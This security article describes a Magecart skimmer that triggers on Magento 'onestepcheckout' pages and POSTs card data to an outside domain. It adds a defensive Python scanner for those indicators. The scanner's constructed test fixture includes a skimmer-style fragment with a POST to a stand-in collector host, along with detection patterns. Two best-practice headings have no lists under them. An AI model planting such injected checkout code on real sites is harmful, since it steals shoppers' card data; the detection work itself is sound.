Researchers found compromised checkout pages on shopping websites that were skimming customers’ debit and credit card information from Magento-based payment forms. Analysis showed that while this Magecart group injected malicious code into all the PHP pages of the compromised websites, the phishing form, which inserts the group’s own card information fields, only appears on the checkout page, where it triggers data exfiltration. After a successful referrer check, obfuscated scripts validate the entered data and exfiltrate it to the cybercriminals’ malicious domain via a POST request. Users are advised to watch for suspicious and redundant information requests, as this group may be using the collected information for further malicious activities.
Jerome Segura of Malwarebytes found the suspicious activity in a web crawl of a Magento-based website, and noted that the phishing form still carried the PayU shopper page redirect instructions even though credit card information fields were present on the same page. Further analysis showed that while all the PHP pages of the website were injected with malicious code, the code is only triggered when the user is on the shopping cart checkout page, with onestepcheckout appearing in the URL in the address bar. The cybercriminals load their own iframe to collect credit card data, validating the information before exfiltration.
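The behaviour described above (a trigger on the onestepcheckout URL, a referrer gate, an injected iframe and a POST to an outside domain) can be turned into a simple static check that a site owner runs over the scripts served from a Magento store. The following is an added example written for this article, not tooling from Trend Micro or Malwarebytes; the allowlisted hosts and the two script fixtures are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Indicators drawn from the skimmer behaviour described above.
TRIGGER_RE = re.compile(r"onestepcheckout", re.IGNORECASE)
REFERRER_RE = re.compile(r"document\.referrer")
IFRAME_RE = re.compile(r"createElement\s*\(\s*['\"]iframe['\"]\s*\)", re.IGNORECASE)
POST_RE = re.compile(r"\.open\s*\(\s*['\"]POST['\"]|method\s*:\s*['\"]POST['\"]", re.IGNORECASE)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed allowlist: the shop itself and its payment provider's host.
SHOP_ALLOWLIST = {"shop.example", "pay.payu.example"}

@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)
    external_hosts: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # The checkout trigger plus a POST to a non-allowlisted host is the
        # core pattern; referrer and iframe hits raise confidence but occur
        # in legitimate code on their own.
        return ("checkout_trigger" in self.indicators
                and "post" in self.indicators
                and bool(self.external_hosts))

def scan_script(path: str, source: str, allowed_hosts: set) -> Finding:
    """Flag indicator hits and outbound hosts not on the shop's allowlist."""
    f = Finding(path=path)
    for name, rx in (("checkout_trigger", TRIGGER_RE), ("referrer_check", REFERRER_RE),
                     ("iframe_injection", IFRAME_RE), ("post", POST_RE)):
        if rx.search(source):
            f.indicators.append(name)
    f.external_hosts = sorted({h.lower() for h in URL_RE.findall(source)
                               if h.lower() not in allowed_hosts})
    return f

# Constructed fixtures (not real injected code): a legitimate PayU redirect
# helper, and a fragment carrying only the indicator strings described above.
LEGIT = '''// send the shopper to the hosted PayU page once the order is placed
window.location = "https://pay.payu.example/checkout?order=" + orderId;'''
INJECTED = '''if (location.href.indexOf("onestepcheckout") > -1 &&
    document.referrer.indexOf("shop.example") > -1) {
  var f = document.createElement("iframe"); /* card fields omitted */
  var x = new XMLHttpRequest(); x.open("POST", "https://collector.invalid/gate.php");
}'''

if __name__ == "__main__":
    for path, src in (("checkout.js", LEGIT), ("injected.js", INJECTED)):
        r = scan_script(path, src, SHOP_ALLOWLIST)
        print(path, "SUSPICIOUS" if r.suspicious else "ok", r.indicators, r.external_hosts)
```

Running this over the real site's theme and module files, with the allowlist set to the shop's own domains and payment provider, surfaces scripts that both key on the checkout URL and talk to an unfamiliar host, which is the combination worth investigating first.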
Online business owners can protect themselves from this threat with these best practices:
Online shoppers are advised to be vigilant and follow these best practices:
The following Trend Micro solutions, powered by XGen™ security, protect users and businesses by blocking the scripts and preventing access to the malicious domains: Trend Micro™ Security; Smart Protection Suites and Worry-Free™ Business Security; Trend Micro Network Defense, and Hybrid Cloud Security.